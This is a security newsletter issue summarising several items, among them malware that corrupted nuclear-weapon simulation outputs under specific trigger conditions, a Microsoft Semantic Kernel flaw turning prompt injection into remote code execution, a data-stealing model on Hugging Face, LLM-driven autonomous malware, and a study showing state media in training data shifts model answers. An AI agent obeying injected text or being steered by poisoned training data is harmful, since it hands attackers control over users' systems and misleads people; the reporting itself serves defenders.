TechLetters ☕️ Fast16 sabotaged nuclear simulations. LLMs are not security boundaries. Hugging Face model stole data. Malware gets agentic. G7 wants post-quantum crypto. Propaganda trains models.
Security
Fast16 cyber weapon designed to corrupt uranium-compression simulations central to Iran’s nuclear weapon design. the targets as LS-DYNA and AUTODYN, two finite element solvers used in everything from car crash tests to explosive detonation modeling. The malware, fast16, used a kernel-level filesystem filter driver to patch executable code on-the-fly without touching the files on disk. It only attacked Intel-Fortran-compiled binaries, and only during specific simulation phases - full-scale transient blast runs. The payload required three conditions to act: (1) an explosives-specific Equation of State (Jones-Wilkins-Lee, Ignition and Growth, or Lee-Tarver), (2) a variable reaching five times its initial value, and (3) material density crossing 30 g/cm³ -- the threshold uranium only reaches under implosion-type nuclear weapon compression. Once triggered, it silently degraded stress tensor outputs (pressure, compressibility) to 1-42% of their true values, scaled gradually to avoid obvious artifacts. The message to the engineers: your bomb doesn’t work. Or: your bomb works better than it actually does. Someone doing this understood nuclear weapons physics well enough to know which output values, if subtly wrong, would silently wreck the design process. That was not Google-searchable knowledge. https://www.security.com/threat-intelligence/fast16-nuclear-sabotage
“Your LLM is not a security boundary”. Do not architect systems as if they were. Microsoft Semantic Kernel could be exploited to to turn prompt injection into host-level remote code executiona and pop a calc.exe. The model behaved perfectly. The framework just trusted it too much. https://www.microsoft.com/en-us/security/blog/2026/05/07/prompts-become-shells-rce-vulnerabilities-ai-agent-frameworks/
Malware-infected LLM model uploaded to Hugging Face (now taken down). It was stealing user data. If you downloaded it recently, make sure to do a proper cleanup and incident handling. The model was supposed to help in private data filtering. It stolen private data. Tainted repository is this: https://huggingface.co/Open-OSS/privacy-filter
By integrating LLMs into malware operations payloads can act autonomously, independently interacting with the victim environment or device, synthesizing system states, and executing precise commands without of human supervision. https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access?e=48754805
G7 calls to transition to post-quantum cryptography. https://assets.publishing.service.gov.uk/media/6966149d8d599f4c09e1ffab/G7-CEG-Quantum-Roadmap.pdf
Privacy
Technology Policy
Other
Propaganda enters the internet as text, then exits the model as an “answer". States do not need to control an AI model directly to shape its answers. They only need to control enough of the text the model learns from. This Nature paper shows that Chinese state-coordinated media entered LLM training data easily. AI models memorized parts of such input material at rates between 3%-10%. When a model was further trained on just 6,400 examples of Chinese state-scripted media, almost 80% of its answers became more favorable to the Chinese government than the base model’s answers. When China-related questions were asked in Chinese human reviewers judged the Chinese answers as more favorable to China 75.3% of the time. The lower the media freedom, the more likely a model is to answer more favorably toward the regime in the local language than in English. The most effective prompt injection starts years before the prompt. This is not a model bug. It is a feature of the world that was loaded into it. https://www.nature.com/articles/s41586-026-10506-7
In case you feel it's worth it to forward this content further:
Subscribed
If you’d like to share: